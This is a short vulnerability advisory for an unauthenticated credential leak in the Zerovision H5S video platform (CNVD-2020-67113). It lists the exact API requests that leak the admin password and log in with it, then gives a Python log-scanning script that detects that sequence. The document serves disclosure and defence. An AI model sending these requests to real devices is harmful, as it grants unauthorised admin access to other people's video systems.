Zerovision Technology H5S Video Platform GetUserInfo Information Leakage Vulnerability CNVD-2020-67113
Vulnerability Description
Zero Vision Technology (Shanghai) Co., Ltd. provides video technology to its customers and aims to simplify IoT video development, relying on technologies such as HTML5 and WebRTC to simplify video playback on all platforms. The company's H5S CONSOLE has an unauthorized access vulnerability.
Vulnerability Impact
Zerovision Technology H5S video platform
Network surveying and mapping
Vulnerability Reproduction
Login page
The API documentation can be accessed without authentication:
/doc/api.html
The following interface leaks the user's account and password:
/api/v1/GetUserInfo?user=admin&session=
The password parameter of the login interface is the account password returned by the interface above, so a login request can be sent directly to obtain cookies:
/api/v1/Login?user=admin&password=02ed400b8d9289f311fc1d68a83fdaaa
After the request succeeds, visit the main page.
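For defenders, the request sequence above leaves a recognizable trace in web access logs. The following is an added detection example, not code from the original post or from the vendor. It assumes a common access-log line format, that HTTP 200 means the request was served, and that the leaked password value is a 32-character hex string as in the request shown above; the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in common access-log format (not from a real system).
SAMPLE_LOG = """\
203.0.113.7 - - [01/Dec/2020:10:00:01 +0000] "GET /doc/api.html HTTP/1.1" 200 5120
203.0.113.7 - - [01/Dec/2020:10:00:05 +0000] "GET /api/v1/GetUserInfo?user=admin&session= HTTP/1.1" 200 312
203.0.113.7 - - [01/Dec/2020:10:00:09 +0000] "GET /api/v1/Login?user=admin&password=00000000000000000000000000000000 HTTP/1.1" 200 148
198.51.100.20 - - [01/Dec/2020:10:02:00 +0000] "GET /api/v1/GetUserInfo?user=op1&session=3f9c1a7e HTTP/1.1" 200 290
198.51.100.21 - - [01/Dec/2020:10:03:00 +0000] "GET /api/v1/GetUserInfo?user=admin&session= HTTP/1.1" 401 0
"""

# client ip, method, request target, status code
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
HEX32 = re.compile(r'^[0-9a-fA-F]{32}$')  # assumed shape of the leaked password value


def find_suspicious(log_text):
    """Return (client_ip, finding) tuples in log order."""
    findings = []
    leaked_to = set()  # clients served GetUserInfo without a session value
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed format
        ip, _method, target, status = m.groups()
        url = urlsplit(target)
        qs = parse_qs(url.query, keep_blank_values=True)
        served = status == "200"
        if url.path == "/doc/api.html" and served:
            findings.append((ip, "api-docs-served"))
        elif (url.path == "/api/v1/GetUserInfo" and served
              and not qs.get("session", [""])[0]):
            # Empty or missing session, yet the server answered 200.
            leaked_to.add(ip)
            findings.append((ip, "userinfo-without-session"))
        elif (url.path == "/api/v1/Login" and served and ip in leaked_to
              and HEX32.match(qs.get("password", [""])[0])):
            # Same client logs in with a hash-shaped password after the leak.
            findings.append((ip, "login-after-leak"))
    return findings


if __name__ == "__main__":
    for ip, finding in find_suspicious(SAMPLE_LOG):
        print(ip, finding)
```

A "login-after-leak" finding means the account's credentials should be treated as exposed and rotated, and the API paths restricted to trusted networks until the platform is updated.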
This post is licensed under CC BY 4.0 by the author.